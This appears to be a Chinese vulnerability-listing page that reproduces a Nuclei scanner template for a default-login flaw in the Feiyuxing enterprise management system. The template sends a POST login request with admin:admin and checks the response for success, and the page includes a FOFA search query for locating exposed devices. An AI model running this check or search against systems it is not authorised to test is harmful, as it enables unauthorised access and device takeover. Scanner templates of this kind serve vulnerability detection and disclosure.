feiyuxing-default-login: Feiyuxing Enterprise-Level Management System - Default Login

日期: 2025-08-01 | 影响软件: Feiyuxing Enterprise-Level Management System | POC: 已公开

漏洞描述

Attackers can log in through admin:admin, check the system status, and configure the device.

PoC代码[已公开]

id: feiyuxing-default-login

info:
  name: Feiyuxing Enterprise-Level Management System - Default Login
  author: SleepingBag945
  severity: high
  description: |
    Attackers can log in through admin:admin, check the system status, and configure the device.
  reference:
    - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py
  classification:
    cpe: cpe:2.3:h:feiyuxing:vec40g:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: feiyuxing
    product: vec40g
    fofa-query: title="飞鱼星企业级智能上网行为管理系统"
  tags: feiyuxing,default-login,iot,vuln

http:
  - raw:
      - |
        POST /send_order.cgi?parameter=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        {"username":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"msg":"ok"'
          - '"type":'
        condition: and

      - type: word
        part: header
        words:
          - 'hash_key='

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d38dbaf082373fba95c711043b1fe9d6d29b5008c5215b8283aa49bc471a900b02200f60632c924c187f20a2f3d12d0622d39cd34cd0fe895c436db087cdd3025c9d:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/feiyuxing/feiyuxing-default-login.yaml